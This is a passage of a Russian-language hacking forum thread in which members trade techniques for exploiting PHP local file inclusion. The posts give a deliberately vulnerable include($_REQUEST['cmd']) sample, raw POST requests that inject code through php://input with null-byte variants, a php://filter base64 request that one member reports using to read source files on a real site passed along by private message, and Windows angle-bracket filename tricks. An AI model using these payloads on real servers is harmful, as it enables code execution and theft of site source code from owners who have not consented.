Старый 19.10.2010, 18:41   #31
tipsy
 
Аватар для tipsy
 
Регистрация: 10.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Чего же не стыкуется?
$patch='/usr/share/pear/'; - на 4113
$patch='/usr/share/php/'; - совпадение на 4114
В обоих случаях суммарная длинна строки ровно 4095

Последний раз редактировалось tipsy; 19.10.2010 в 18:44..
tipsy вне форума   Ответить с цитированием
Старый 19.10.2010, 19:31   #32
che
 
Аватар для che
 
Регистрация: 05.07.2010
Сообщений: 144
Репутация: 166
По умолчанию

теперь понятно, надо было сразу проверить

Последний раз редактировалось che; 19.10.2010 в 20:07..
che вне форума   Ответить с цитированием
Старый 28.10.2010, 21:23   #33
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Сообщение от nikp Посмотреть сообщение
Начиная с 5.1.0 нужно allow_url_include = On,
до версии 5.1.0 обертка выполняется даже при allow_url_fopen = Off

Чтобы посмотреть, как работает, можно составить пример
in2.php
PHP код:
<?php
include($_REQUEST['cmd']);
?>
И отправить пакет

Код:
POST http://localhost/in2.php?cmd=php://input HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: localhost
Content-length: 19

<?php phpinfo(); ?>
сегодня потестил - прокатило и на PHP Version 5.2.14 (испытуемый сайт могу скинуть в личку)

allow_url_fopen On
allow_url_include Off

что в итоге делает данный метод самым крутым (имхо) в плане эксплуатации LFI максимально эффективно:

1. Метод POST
2. Без записи в логах о том, что вообще было сделано, кроме как обращение к файлу+параметр+php://input
3. Возможность выполнения кода - любого, без ограничений практически, сразу в запросе

PS: Данный метод подерживает и нуль байт, т.е. вполне допустима такая конструкция:

Код:
POST /path/ololo.php?cmd=php://input%00 HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: site.com
Content-Length: 13

<?phpinfo()?>
Возможно эксплуатировать при следующем коде:

PHP код:
1. include($_REQUEST['cmd']);
2. include($_REQUEST['cmd'] . ".php"); 
НЕвозможно эксплуатировать при следующем коде:

PHP код:
1. include("../" $_REQUEST['cmd'] . ".php"); 
Очень и очень удобно использовать данный метод в мультиплатформенном и бесплатном (с некоторыми ограничениями) Burp Suite v1.3.03

http://portswigger.net/burp/

тестил под убунтой, перед использованием:

sudo apt-get install sun-java6-jre sun-java6-plugin sun-java6-fonts

проверить, что JRE установилось:

$ java -version
Pashkela вне форума   Ответить с цитированием
Старый 29.10.2010, 11:41   #34
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

те же условия:
PHP Version 5.2.14
allow_url_fopen On
allow_url_include Off
=>
Warning: include(php://input) [function.include]: failed to open stream: operation failed in /xxx/yyy/index.php on line 6

Warning: include() [function.include]: Failed opening 'php://input' for inclusion (include_path='.:/usr/local/lib/php:/usr/local/php5/lib/pear') in /xxx/yyy/index.php on line 6

сайт скинул в личку

upd
похоже не выполнено условие:
include($_REQUEST['cmd']);
DrakonHaSh вне форума   Ответить с цитированием
Старый 29.10.2010, 12:16   #35
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 252
Репутация: 155
По умолчанию

Не должно это работать при таких настройках, ну если они там в последнем обновлении пыха не накосячили ничего.
Так что Паш, не вводи людей в заблуждение, или оттесть нормально и разберись почему работает, ибо это ненормально, и хотелось-бы точно знать почему у тебя там сработало
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 29.10.2010, 13:13   #36
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Да, посмотрел, сорри, там не include стоит, а eval($_REQUEST) Приношу извинения
Pashkela вне форума   Ответить с цитированием
Старый 10.11.2010, 12:43   #37
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

вообще-то Pashkela оказался, по сути, прав.
тот сайт, что я ему сбросил в личку

PHP Version 5.2.14
allow_url_fopen On
allow_url_include Off

и который не работал с ?cmd=php://input%00
он раскрутил с помощью
?cmd=php://filter/convert.base64-encode/resource=/xxx/yyy.php%00

хотя, по идее:
Цитата:
- php://input
- php://filter (available since PHP 5.0.0)

- php://memory (available since PHP 5.1.0)
- php://temp (available since PHP 5.1.0)
Некоторые из них могут быть использованы для передачи данных скрипту в обход всех фильтров.
Опять же, в официальном мануале на использование данного метода накладывается следующее ограничение на атакуемый сервер, php.ini:
allow_url_include = On (PHP >= 5.1.0)
использованная дыра:
Код:
Global $HTTP_GET_VARS; // не знаю, имеет ли это значение, но мало ли :)
$cmd = $_GET[cmd];
include ("$cmd/index.php");
DrakonHaSh вне форума   Ответить с цитированием
Старый 10.11.2010, 13:02   #38
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 252
Репутация: 155
По умолчанию

http://ru2.php.net/manual/en/wrappers.php.php

Для локальных файлов и php://filter allow_url_include = on не нужен
__________________
------------------

Последний раз редактировалось Jokester; 10.11.2010 в 13:19..
Jokester вне форума   Ответить с цитированием
Старый 10.11.2010, 13:09   #39
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

ясн, ты как всегда на высоте
но тогда на первой странице надо изменения внести - там, получается, "деза"
DrakonHaSh вне форума   Ответить с цитированием
Старый 25.11.2010, 11:24   #40
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

В windows угловые скобки можно использовать не только в конце названия файла
PHP код:
include("phpinfo.php>");
include(
"phpinfo.php<"); 
Но и играться с самим расширением
PHP код:
include("phpinfo.ph>");
include(
"phpinfo.ph<"); 
Идея взята отсюда:
http://snipper.ru/view/18/maloizvest...-prilozheniya/
http://code.google.com/p/pasc2at/wiki/SimplifiedChinese

Однако, это еще не все, вполне корректно сработают и такие инклюды...
PHP код:
include("phpinfo.p<");
include(
"phpinfo.<"); 
BlackFan вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot